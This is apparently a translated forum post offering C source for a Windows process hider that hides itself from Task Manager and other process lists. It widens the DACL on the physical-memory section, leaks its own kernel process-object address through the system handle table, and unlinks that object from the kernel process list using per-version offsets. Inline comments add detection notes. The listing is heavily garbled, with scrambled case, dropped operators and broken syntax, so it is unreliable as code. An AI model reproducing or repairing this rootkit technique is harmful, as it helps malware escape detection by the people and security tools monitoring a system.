Universal version of the user-mode process hider


Process hiding based on hooking ZwQuerySystemInformation is done in driver mode; here it is implemented by operating on memory directly instead, so it works across different system versions. Power ... from the driver development network ... suitable for those of us who are driver idiots ^ _ ^

Note: during testing, because this runs in command-line mode, what is actually hidden is the process itself in Task Manager's process list ... change the rest yourself ...

Here is the source code:

#include

#include

#include

#include

#include

#include

#include

// Status helpers mirroring ntstatus.h: NT_SUCCESS is true for a non-negative
// NTSTATUS, and the two codes below are the ones the functions in this file
// test for (buffer too small, and access denied on the section object).
// NOTE(review): the whole listing is garbled (case-scrambled, operators and
// header names dropped) and does not compile as shown; these three lines are
// also repeated verbatim further down.
#define nt_success (status) (status)> = 0)

#DEFINE STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)

#define status_access_denied ((ntstatus) 0xc0000022L)

// Signed status code; negative values are failures (see nt_success above).
TypedEf long NTSTATUS;

// Mirror of the native IO_STATUS_BLOCK (status + information word).
// Declared for completeness; no function in this listing uses it.
Typedef struct _io_status_block

{

NTSTATUS STATUS;

Ulong information;

} }_Status_block, * pio_status_block;

// Mirror of the native UNICODE_STRING (byte length, capacity, wide buffer).
// Filled by RtlInitUnicodeString in OpenPhysicalMemory to name the section
// object that is opened.
Typedef struct _unicate_string

{

Ushort Length;

Ushort maximumlength;

PWSTR BUFFER;

} Unicode_string, * punicode_string;

// OBJECT_ATTRIBUTES.attributes flag values (OBJ_*). Copied from the native
// headers; OpenPhysicalMemory sets attributes = 0, so none of them is used
// in this listing.
#define obj_inherit 0x00000002L

#define obj_pers_Permanent 0x00000010L

#define obj_exclusive 0x00000020L

#define obj_case_insensitive 0x00000040L

#define obj_openif 0x00000080L

#define obj_openlink 0x00000100L

#define obj_kernel_handle 0x00000200L

#define obj_valid_attributes 0x000003F2L

// Duplicate of the status-code definitions near the top of the file.
#DEFINE STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)

#define status_access_denied ((ntstatus) 0xc0000022L)

/ *

*********************************************************** **********************

* NTDDK.H

* /

// Second typedef of NTSTATUS (the first is near the top of the file).
TypedEf long NTSTATUS;

// Access-rights bit mask, as used in SYSTEM_HANDLE_INFORMATION and ZwOpenSection.
TypedEf Ulong Access_mask;

/ *

* NTDEF.H

*********************************************************** **********************

* /

/ *

*********************************************************** **********************

* << Windows NT / 2000 Native API Reference >> - Gary Nebbett

* /

// Only the one information class this file queries is declared:
// class 16 returns the system-wide handle table (see GETEPROCESSFROMPID).
Typedef enum _system_information_class

{

SystemHandleinFormation = 16} system_information_class;

/ *

* Information Class 16

* /

// One record of the SystemHandleInformation result: the owning process id,
// the object type index, flags, the handle value, the kernel address of the
// object, and the access granted on the handle.
// Defender note: the Object field discloses a kernel pointer to user mode;
// that disclosure is what GETEPROCESSFROMPID relies on to learn the address of
// its own process object. Later Windows versions restrict this disclosure
// (confirm per version); treating it as sensitive is the relevant mitigation.
Typedef struct _system_handle_information

{

Ulong processid;

Uchar ObjectTypenumber;

Uchar flags;

Ushort handle;

PVOID Object;

Access_mask grantedAccess;

} System_handle_information, * psystem_handle_information;

// Native-style initializer for OBJECT_ATTRIBUTES. Unused here: OpenPhysicalMemory
// fills the structure field by field instead.
#define InitializeObjectAttributes (p, n, a, r, s) {(p) -> length = sizeof (object_attributes); (P) -> rootdirectory = r; (p) -> attributes = a; (p) -> Objectname = n; (p) -> securityDescriptor = s; (p) -> securityQualityofService = null;}

/ *

*********************************************************** **********************

* << Windows NT / 2000 Native API Reference >> - Gary Nebbett

*********************************************************** **********************

* /

// Function-pointer types for the two ntdll exports resolved at run time:
// RtlNtStatusToDosError (declared but never resolved in this listing) and
// ZwQuerySystemInformation (resolved in LocatedllenTry).
Typedef ulong (__stdcall * rtlntstatustodoserror) (in ntstatus status);

typedef NTSTATUS (__stdcall * ZWQUERYSYSTEMINFORMATION) (IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL);

/ ************************************************** **********************

* *

* Function Prototype *

* *

*********************************************************** ********************* /

// Forward declarations for the two file-local helpers defined below.
Static DWORD GETEPROCESSFROMPID (ULONG PID);

Static Bool LocatedllenTry (Void);

/ ************************************************** **********************

* ** static global var *

* *

*********************************************************** ********************* /

// Resolved ntdll entry points. Only ZwQuerySystemInformation is ever assigned
// (in LocatedllenTry); the RtlNtStatusToDosError pointer and `hmodule` are
// declared but not used elsewhere in this listing.
Static RTLNTSTATASERROR RTLNTSTATASERROR = NULL;

STATIC ZWQUERYSYSTEMINFORMATION ZWQUERYSYSTEMINFORMATION = NULL;

Static hmodule hmodule = null;

/ ************************************************** ********************** /

// Look up the kernel process-object address for process `PID` from user mode.
// Queries SystemHandleInformation (class 16) with a buffer that doubles until
// the call stops failing with STATUS_INFO_LENGTH_MISMATCH, then scans the
// returned handle records for one owned by PID whose object type index is 5
// (the Process type on the targeted Windows versions, per the caller's note)
// and returns that record's kernel Object pointer.
// Returns 0 (`False`) on allocation or query failure, or when no matching
// handle exists; a caller cannot distinguish that from a genuine null pointer.
// Defender note: a user-mode process walking the system handle table to
// recover a kernel object address is a classic rootkit precursor; the useful
// control is limiting the kernel-pointer disclosure in this information class.
Static DWORD GETEPROCESSFROMPID (ULONG PID)

{

NTSTATUS STATUS;

PVOID BUF = NULL;

Ulong size = 1;

Ulong Numofhandle = 0;

Ulong i;

Psystem_handle_information h_info = null;

// Grow the buffer geometrically until the query fits.
for (size = 1; size * = 2)

{

IF (null == (buf = Calloc (size, 1))))

{

FPRINTF (stderr, "Calloc (% U, 1) Failed / N", size);

Goto geteprocessFromPid_exit;

}

Status = ZwQuerySystemInformation (SystemHandleinformation, BUF, SIZE, NULL);

IF (! NT_Success (status))

{

// Buffer too small: release it and retry with the next size.
IF (status_info_length_mismatch == status)

{

Free (BUF);

BUF = NULL;

}

Else

{

Printf ("ZwQuerySystemInformation () failed");

Goto geteprocessFromPid_exit;

}

}

Else

{

Break;

}

} / * End of for * /

// The buffer begins with a ULONG count of records; the records follow it.

Numofhandle = (ulong) BUF;

H_INFO = (psystem_handle_information) ((Ulong) BUF 4);

For (i = 0; i

{

// Match on owning process id and object type index 5 (Process).
IF ((h_info [i] .processid == pid) && (H_INFO [i] .ObjectTypenumber == 5)) // && (h_info [i] .handle == 0x3d8)) {

// Prints the kernel object address to stdout.
Printf ("Handle: 0x% x, Object 0x% x / N / R", H_INFO [i] .handle, H_INFO [i] .Object);

// Early return: the query buffer is not released on this path.
Return ((DWORD) (H_INFO [i] .Object);

}

}

GeteprocessFromPid_exit:

IF (buf! = NULL)

{

Free (BUF);

BUF = NULL;

}

Return (False);

}

/ *

* NTDLL.DLL

* /

// Resolve ZwQuerySystemInformation from the already-loaded ntdll.dll
// (GetModuleHandle + GetProcAddress) into the file-scope pointer.
// Returns TRUE on success; prints a message and returns FALSE otherwise.
// Defender note: resolving Zw*/Nt* exports by name at run time instead of
// importing them is a common trait of tooling that wants a sparse import
// table; it is a weak but cheap static indicator.
Static Bool LocatedllenTry (Void)

{

BOOL RET = FALSE;

Char NTDLL_DLL [] = "ntdll.dll";

HModule NTDLL_DLL = NULL;

IF ((NTDLL_DLL = getModuleHandle (NTDLL_DLL)) == NULL)

{

Printf ("GetModuleHandle () Failed");

Return (False);

}

IF (! (zwQuerySystemInformation) getProcadDress (NTDLL_DLL, ZWQUERYSYSTEMINFORMATION)))))

{

Goto LocatedllenTry_Exit;

}

Ret = true;

LocatentdllenTry_exit:

IF (false == RET)

{

PRINTF ("GetProcadDress () Failed");

}

// The module handle from GetModuleHandle is not owned, so nothing is freed.
NTDLL_DLL = NULL;

Return (RET);

}

// Mirror of the native OBJECT_ATTRIBUTES passed to ZwOpenSection; filled
// field by field in OpenPhysicalMemory.
Typedef struct _object_attributes

{

Ulong Length;

Handle rootdirectory;

Punicode_String ObjectName;

Ulong attributes;

PVOID SecurityDescriptor;

Pvoid ​​SecurityQualityOfService;

} Object_attributes, * pobject_attribute;

// Function-pointer types for the two further ntdll exports resolved in
// initntll: ZwOpenSection (opens a named section object) and
// RtlInitUnicodeString (fills a UNICODE_STRING from a wide C string).
TypeDef NTSTATUS (Callback * ZWopense) (

Out phandle sectionhandle,

IN Access_mask desidaccess,

In POBJECT_ATTRIBUTES OBJECTATTRIBUTES

);

Typedef void (Callback * RTLinitUnicodestring)

In out dstinationstring,

In Pcwstr SourceString

);

// Resolved ntdll entry points (set in initntll).
RTLinitunicodeString RTLinitunicodeString;

Zwopensection Zwopense;

// LoadLibrary handle for ntdll.dll, released by Closentdll.
HModule g_hntdll = null;

// Read-only view of 0x1000 bytes of physical memory at offset 0x30000
// (mapped in OpenPhysicalMemory); LineArtophys indexes it as a page directory.
PVOID G_PMAPPHYSICALMORY = NULL;

// Handle to the physical-memory section object opened by OpenPhysicalMemory.
Handle g_hmpm = NULL;

// Load ntdll.dll and resolve RtlInitUnicodeString and ZwOpenSection into the
// file-scope pointers. Returns FALSE only if LoadLibrary fails; the two
// GetProcAddress results are stored unchecked, so TRUE does not guarantee
// that either pointer is non-NULL.
BOOL initntll ()

{

g_hntdll = loadingLibrary ("ntdll.dll");

IF (! g_hntdll)

{

Return False;

}

RTLINITUNICODESTRING =

(RTLinitunicodeString) GetProcaddress (g_hntdll, "rtLinitUnicodestring");

Zwopensection =

(Zwopensection) GetProcaddress (g_hntdll, "zwopensection");

Return True;

}

// Release the ntdll.dll reference taken by initntll. The handle variable is
// left as-is afterwards (not reset to NULL).
Void Closentdll ()

{

IF (g_hntdll! = null)

{

Freelibrary (g_hntdll);

}

}

// Rewrite the DACL of the given section object so that the trustee named
// "current_user" is granted SECTION_MAP_WRITE: read the current DACL with
// GetSecurityInfo, merge one EXPLICIT_ACCESS entry via SetEntriesInAcl, and
// write the result back with SetSecurityInfo. Errors are silently ignored;
// the function has no return value. Expects a handle opened with at least
// READ_CONTROL | WRITE_DAC (see OpenPhysicalMemory).
// Defender note: a DACL change on the physical-memory section object is a
// high-fidelity indicator — object-access auditing (a SACL) on that object
// surfaces it. The capability it enables (user-mode mapping of physical
// memory) was withdrawn in later Windows releases; confirm per version.
Void SetPhyscialMemorysectionCanbewrite (Handle Hsection)

{

PACL PDACL = NULL;

PACL PNEWDACL = NULL;

PSecurity_Descriptor PSD = NULL;

DWORD DWRES;

EXPLICIT_ACCESS EA;

// Fetch the existing DACL (and the descriptor that owns it, freed below).
IF (dwres = getsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION,

NULL, NULL, & PDACL, NULL, & PSD)! = Error_Success

{

Goto cleanup;

}

// One grant-access entry for the named trustee.
ZeromeMory (& EA, SIZEOF (EXPLICIT_ACCESS));

Ea.grfaccesspermissions = section_map_write;

Ea.grfaccessmode = GRANT_ACCESS;

Ea.grfinheritance = no_inheritance;

Ea.trustee.trusteeform = trustee_is_name;

EA.TRUSTEE.TRUSTEETEETYPE = trustee_is_user;

Ea.trustee.ptStrName = "current_user";

IF (dwres = setENTRIESINACL (1, & EA, PDACL, & PNEWDACL)! = Error_Success)

{

Goto cleanup;

}

IF (dwres = setsecurityInfo (hsection, se_kernel_object, dacl_security_information, null, null, pnewdacl, null)! = error_success

{

Goto cleanup;

}

Cleanup:

IF (PSD)

Localfree (PSD);

IF (PNewDACL)

LocalFree (PNewDACL);

}

// Open the physical-memory section object for read/write and map one page
// of it. If the first open is refused with STATUS_ACCESS_DENIED, the section
// is reopened with READ_CONTROL | WRITE_DAC, its DACL is widened by
// SetPhyscialMemorysectionCanbewrite, the handle is closed and the open is
// retried. On success g_hmpm holds the section handle and
// g_pmapphysicalmemory a read-only (4 = FILE_MAP_READ) view of 0x1000 bytes
// at physical offset 0x30000; the handle is returned. Returns NULL if the
// open or the mapping fails (the handle is not closed on the latter path).
// The 0x30000 offset is a hard-coded assumption about where the kernel page
// directory lives — LineArtophys treats this view as that directory.
Handle OpenPhysicalMemory ()

{

NTSTATUS STATUS;

Unicode_string physmemstring;

Object_attributes attributes;

RTLinitunicodeString (& PhysmemString, L "// device // physicalmemory);

Attributes.Length = sizeof (Object_attributes);

Attributes.rootdirectory = NULL;

Attributes.Objectname = & physmemstring;

Attributes.attributes = 0; attributes.securityDescriptor = null;

Attributes.securityqualityofservice = null;

Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes);

// Access denied: widen the object's DACL, then try again.
IF (status == status_access_denied) {

Status = zwopensection (& g_hmpm, read_control | write_dac, & attributes);

SetPhyscialMemorySectionCanbewrite (g_hmpm);

CloseHandle (G_HMPM);

Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes);

}

IF (! NT_Success (status))

{

Return NULL;

}

g_pmapphysicalmemory = mappviewoffile

g_hmpm,

4,

0,

0x30000,

0x1000);

IF (g_pmapphysicalmemory == null)

{

Return NULL;

}

Return G_HMPM;

}

// Translate a kernel virtual address to a physical address by walking the
// page directory at BaseAddress (the view mapped in OpenPhysicalMemory).
// Assumes 32-bit non-PAE two-level paging (10/10/12 split), as the >> 22
// shift and the 0x003FF000 / 0x00000FFF masks show. Addresses in
// [0x80000000, 0xA0000000) are treated as directly mapped and translated by
// subtracting 0x80000000 without touching the tables. Otherwise: if the
// directory entry is not present (bit 0 clear) return 0; if its large-page
// bit (0x80) is set, combine the 4 MiB frame with the low 22 address bits;
// else map the page table's physical page, read the entry for the address,
// and combine the 4 KiB frame with the page offset — returning 0 if that
// entry is not present (the mapped view is only unmapped on the success path).
Pvoid ​​LineArtophys (Pulong Baseaddress, Pvoid ​​Addr)

{

Ulong Vaddr = (Ulong) Addr, PGDE, PTE, PADDR

IF (VADDR> = 0x80000000 && Vaddr <0xa0000000)

{

PADDR = VADDR-0x80000000;

Return (PVOID) PADDR;

}

// Page-directory entry for the top 10 bits of the address.
PGDE = BaseAddress [VADDR >> 22];

IF ((pgde & 1)! = 0)

{

// Bit 7: entry maps a 4 MiB page directly.
Ulong TMP = PGDE & 0x00000080;

IF (TMP! = 0)

{

Paddr = (PGDE & 0xFFC00000) (VADDR & 0x003FFFF);

}

Else

{

// Map the page table's frame and read the entry for the middle 10 bits.
PGDE = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000);

PTE = ((pulong) PGDE [(VADDR & 0x003FF000) >> 12];

IF ((PTE & 1)! = 0)

{

PADDR = (PTE & 0xFfffff000) (VADDR & 0x00000FFF);

UNMAPVIEWOFFILE ((pvoid) PGDE;

}

Else Return 0;

}

}

Else Return 0;

Return (PVOID) PADDR;

}

// Read one ULONG at kernel virtual address ADDR: translate it to a physical
// address with LineArtophys, map the containing 4 KiB page read-only (4 =
// FILE_MAP_READ), fetch the word at the page offset, and unmap. Returns 0 if
// the mapping fails, which is indistinguishable from a stored value of 0.
Ulong getData (PVOID ADDR)

{

Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr;

Pulong TMP = (pulong) MapViewOffile (g_hmpm, 4, 0, phys & 0xffff000, 0x1000);

IF (TMP == 0)

Return 0;

// Word index within the page: low 12 bits of the address divided by 4.
Ulong Ret = TMP [(Phys & 0xFFF) >> 2];

UNMAPVIEWOFFILE (TMP); RETURN RET;

}

// Write one ULONG to kernel virtual address ADDR through the physical-memory
// section: translate with LineArtophys, map the containing page writable
// (file_map_write), store the word, unmap. Returns FALSE if the mapping
// fails, TRUE otherwise.
// Defender note: this is an arbitrary physical-memory write from user mode,
// i.e. effectively kernel-level access; the control is denying user-mode
// write access to the physical-memory section object (see the DACL change
// in SetPhyscialMemorysectionCanbewrite, which is what makes it possible here).
Bool SetData (PVOID ADDR, ULONG DATA)

{

Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr;

Pulong TMP = (Pulong) MapViewOffile (g_hmpm, file_map_write, 0, phys & 0xffff000, 0x1000);

IF (TMP == 0)

Return False;

TMP [(Phys & 0xFFF) >> 2] = DATA;

UnmapViewoffile (TMP);

Return True;

}

// Unlink the calling process's kernel process object from the kernel's
// process list by patching it through the physical-memory section:
// 1. load ntdll and open/map physical memory (OpenPhysicalMemory);
// 2. pick the two link-word offsets f/b inside the process object by OS
//    version (Win2K, WinXP, Win2003, NT4); unknown versions return FALSE;
// 3. open a handle to itself so a Process-type handle owned by this PID
//    exists, then recover the object address via GETEPROCESSFROMPID;
// 4. read the two link words at process+f / process+b and write them into
//    the neighbouring objects so that list walkers skip this entry;
// 5. release the view, section handle and ntdll.
// Returns TRUE unless a version check or OpenPhysicalMemory fails — including
// when initntdll() fails, because that branch falls through to the final
// return. The results of LocatedllenTry, GETEPROCESSFROMPID, getData and
// SetData are not checked.
// Defender note: this is direct kernel object manipulation (DKOM); the
// process keeps running, keeps its threads and handles, and keeps generating
// events, so cross-view detection (comparing list-based enumeration with
// handle-, thread- or event-based views of the process set) is the standard
// response. The page's own note says the effect is visible in Task Manager.
Bool hideprocessatall ()

{

IF (initntdll ())

{

Openphysicalmemory () == 0)

{

Return False;

}

INT F, B;

OsversionInfo Osvi;

Osvi.dwosversionInfosize = Sizeof (OSVI);

GetVersionex (& OSVI);

// f = 0x88; b = 0x8c;

// Per-version offsets of the forward/backward link words inside the
// process object; the technique is only as portable as this table.
IF (Osvi.dwmajorversion == 5)

{

IF (Osvi.dwminorversion == 0) // Win2K

{

f = 0xA0; b = 0xA4;

}

Else if (Osvi.dwminorversion == 1) // WinXP

{

f = 0x88; b = 0x8c;

}

Else if (Osvi.dwminorVersion == 2) // Win2003

{

F = 0x8a; b = 0x8e;

}

Else Return False;

}

Else if (Osvi.dwmajorversion == 4 && Osvi.dwminorversion == 0 && Osvi.dwplatformID == 2) // NT

{

f = 0x98; b = 0x9c;

}

Else Return False;

// ulong thread = getdata (pvoid) 0xffdff124);

// ulong process = getData ((pvoid) (Thread 0x22C);

Locatentdllentry ();

// Open a handle to ourselves so that a handle of object type 5 (Process)
// owned by this PID appears in the system handle table.

OpenProcess (Process_All_Access, false, getcurrentprocessid ());

Ulong process = (ulong) getEprocessFromPid ((DWORD) getCurrentProcessId ());

// Forward and backward link words of this entry.
Ulong fw = getData (PVOID (Process F));

Ulong bw = getData (PVOID (Process B));

// Point the neighbours at each other, bypassing this entry.
SetData (PVOID (FW 4), BW);

SetDATA (PVOID (BW), FW);

UNMAPVIEWOFFILE (g_pmapphysicalmemory);

CloseHandle (G_HMPM);

Closentdll ();

}

Return True;

}

// Entry point: run the hider, then stay alive for 30 s so the effect can be
// checked in a process viewer (as the page's note describes), print a line
// and exit. The hider's return value is ignored.
Int main (int Argc, char * argv [])

{

HideProcessatall ();

SLEEP (30 * 1000);

Printf ("Hello World! / N"); Return 0;

}

